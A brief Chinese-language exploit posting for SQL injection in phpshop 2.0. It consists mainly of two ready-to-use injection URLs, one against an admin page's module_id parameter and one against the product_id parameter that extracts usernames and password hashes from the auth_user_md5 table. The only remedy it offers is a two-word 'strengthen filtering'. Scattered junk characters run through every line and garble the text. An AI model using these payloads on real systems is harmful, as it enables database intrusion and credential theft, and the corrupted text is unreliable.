标题 : phpshop 2.0 SQL Injection Vulnerability0 e0 O9 [: z6 I) P
" Y: l. K9 H4 R& d7 A# W作者 : By onestree( p* _% ?$ c6 Q: D) x4 U
下载地址 : http://code.google.com/p/phpshop/downloads/list
, b% T2 E$ A2 {) T测试地址: windows 7 / ubuntu% n+ X$ s: e, a
8 c4 m& Z8 |6 W A$ r/ C
9 \* A9 O% q) s9 XSQLi p0c:! m2 H5 d" V$ h
! r4 N6 }% \; _" n" o8 O==================; a0 Y0 `7 b3 m% }
6 u/ _4 L- e- h8 b
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
9 x' |: L+ W- W" |union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --5 `0 S0 i! R1 O! l
1 n* M! `% `& f: f* _http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& u! k/ V2 L( p3 R& ?4 T/ U, b$ H8 p( ?; k
修复:! ?# ]8 i' C/ _5 ^7 K* s; E3 D
加强过滤) T5 [3 A- R' E# `, K# I
/ N: [5 n& B* o( V) t& G0 \) Q7 u: O/ h+ D
|